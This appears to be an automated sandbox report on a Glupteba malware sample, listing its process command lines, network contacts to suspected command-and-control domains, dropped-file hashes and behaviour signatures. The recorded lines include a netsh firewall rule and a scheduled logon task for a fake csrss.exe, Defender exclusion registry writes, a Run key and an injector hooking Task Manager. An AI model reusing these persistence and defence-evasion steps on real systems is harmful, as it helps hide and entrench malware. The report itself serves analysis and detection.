C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3584 -ip 3584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3584 -s 728
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3584 -ip 3584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3584 -s 748
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3584 -ip 3584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3584 -s 688
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3584 -ip 3584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3584 -s 780
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3584 -ip 3584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3584 -s 816
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3584 -ip 3584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3584 -s 696
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3584 -ip 3584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3584 -s 748
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3584 -ip 3584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3584 -s 620
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3584 -ip 3584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3584 -s 620
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3584 -ip 3584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3584 -s 888
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3584 -ip 3584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3584 -s 864
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3584 -ip 3584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3584 -s 792
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3584 -ip 3584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3584 -s 868
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3584 -ip 3584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3584 -s 616
C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe
"C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 332
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 336
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 336
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 628
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 628
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 628
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 708
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 724
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 640
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 628
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 840
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 744
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 572
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 732
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1440
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1456
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1464
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /133-133
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4076 -ip 4076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 368
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4076 -ip 4076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 376
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4076 -ip 4076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4076 -ip 4076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 664
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4076 -ip 4076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 664
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4076 -ip 4076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4076 -ip 4076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 728
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4076 -ip 4076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 748
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4076 -ip 4076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 764
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4076 -ip 4076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 856
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4076 -ip 4076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 764
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4076 -ip 4076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 860
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4076 -ip 4076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4076 -ip 4076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 888
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4076 -ip 4076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 920
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4076 -ip 4076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 920
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4076 -ip 4076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 976
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4076 -ip 4076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 956
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4076 -ip 4076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 1520
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4076 -ip 4076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 1532
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4076 -ip 4076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 1600
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4076 -ip 4076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 1448
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4076 -ip 4076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 1568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4076 -ip 4076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 1608
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4076 -ip 4076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 1652
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4076 -ip 4076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 1464
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4076 -ip 4076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 1580
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4076 -ip 4076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 1496
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | humisnee.com | udp |
| NL | 37.48.65.149:443 | humisnee.com | tcp |
| US | 8.8.8.8:53 | survey-smiles.com | udp |
| US | 199.59.243.227:80 | survey-smiles.com | tcp |
| US | 8.8.8.8:53 | 149.65.48.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.243.59.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ninhaine.com | udp |
| US | 8.8.8.8:53 | 2makestorage.com | udp |
| US | 8.8.8.8:53 | nisdably.com | udp |
| US | 8.8.8.8:53 | 3deb3a83-62c0-4778-bc6b-23ad3ebd8d39.ninhaine.com | udp |
| US | 8.8.8.8:53 | server10.ninhaine.com | udp |
| CZ | 46.8.8.100:443 | server10.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server10.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server10.ninhaine.com | tcp |
| US | 8.8.8.8:53 | ww82.ninhaine.com | udp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | 100.8.8.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | spolaect.info | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| CZ | 46.8.8.100:443 | server10.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server10.ninhaine.com | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server10.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
Files
memory/3584-1-0x0000000003EA0000-0x00000000042E8000-memory.dmp
memory/3584-2-0x00000000042F0000-0x0000000004C16000-memory.dmp
memory/3584-3-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/3584-5-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/3584-7-0x00000000042F0000-0x0000000004C16000-memory.dmp
memory/3584-6-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/1860-8-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1860-9-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1860-10-0x0000000000400000-0x00000000021A3000-memory.dmp
C:\Windows\rss\csrss.exe
| MD5 | 1485d115c0db789ed882e6da39b845d0 |
| SHA1 | b25ee4515f5a1a8b420e7eba38f233ee64a24755 |
| SHA256 | 036e1c48be2a9fde1e94334dcb1216eec8512b38c118234c118aaa47b6ad65c7 |
| SHA512 | c8571df02ca3c8d69c49393d45a032a291c6f5c7100564e9a1337f287abd195c903bf86a20217990de38627d2a646dc7dde0e3953827afa94db270124c1f559b |
memory/1860-14-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/4076-18-0x0000000000400000-0x00000000021A3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
memory/4076-24-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/4076-25-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/4076-26-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/4076-27-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/4076-28-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/4076-29-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/4076-30-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/4076-31-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/4076-32-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/4076-33-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/4076-34-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/4076-35-0x0000000000400000-0x00000000021A3000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win7-20241023-en
Max time kernel
150s
Max time network
123s
Command Line
Signatures
Glupteba
Glupteba family
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
MetaSploit
Metasploit family
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\RoughWater = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\app.exe = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\Winmon.sys | C:\Windows\rss\csrss.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\RoughWater = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\app.exe = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\RoughWater = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
Checks installed software on the system
Manipulates WinMon driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMon | C:\Windows\rss\csrss.exe | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| File created | C:\Windows\Logs\CBS\CbsPersist_20241108014114.cab | C:\Windows\system32\makecab.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
